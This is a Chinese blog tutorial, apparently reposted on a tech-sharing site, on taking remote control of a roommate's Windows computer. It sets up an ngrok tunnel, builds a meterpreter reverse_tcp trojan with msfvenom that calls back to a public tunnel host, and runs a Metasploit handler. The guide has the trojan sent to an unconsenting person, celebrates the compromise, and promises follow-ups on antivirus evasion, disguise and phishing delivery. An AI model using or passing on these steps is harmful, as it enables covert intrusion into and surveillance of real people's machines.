标签：metasploit kali sunny 舍友 tcp 木马 公网 ngrok

用metasploit映射公网远程控制舍友电脑

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。

实验原理：用metasploit制作木马，发送到目标主机上，双击运行后反向连接到ngrok监听的端口，由ngrok指定的端口传输到kali监听的端口，从而控制目标主机

1. 打开kali
2. 下载sunny，网址www.ngrok.cc,注册后

 

 

 

 

 

 

免费购买一个tcp连接的服务器隧道，

 

 

 

 

 

 

保存好自己的隧道id，第四步会用到

1. https://www.ngrok.cc/download.html，下载对应的sunny（ngrok客户端），比如我的kali是64位的，就下载64位的

    

    

查看kali处理器架构使用命令：arch

 

 

 

 

 

 

 

4，

切换到sunny所在的目录，输入chmod 777 ./* 对当前文件夹的文件加上权限，再输入./sunny clientid [先前保存的id]，启动映射隧道

 

 

 

 

 

 

 

 

1. 新建一个终端窗口，进入超级管理员权限，msfvenom -p windows/meterpreter/reverse_tcp lhost=vipgz6.91tunnel.com lport=10663 -f exe > shell.exe
2. 将生成的木马传给舍友，

    

    

目前我们先不考虑对木马的伪装以及免杀

1. kali打开msfconsole，输入以下命令：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 6666

exploit

 

 

 

7.双击舍友电脑上的木马，成功上线

 

 

 

8.查看他的ip

 

 

 

 

 

 

1. 验证一下吧
2. 拿下！

免杀和木马伪装以及如何钓鱼将木马发送给舍友请关注qq群后续分享

标签：metasploit,kali,sunny,舍友,tcp,木马,公网,ngrok
来源： https://www.cnblogs.com/mel0n/p/16640552.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。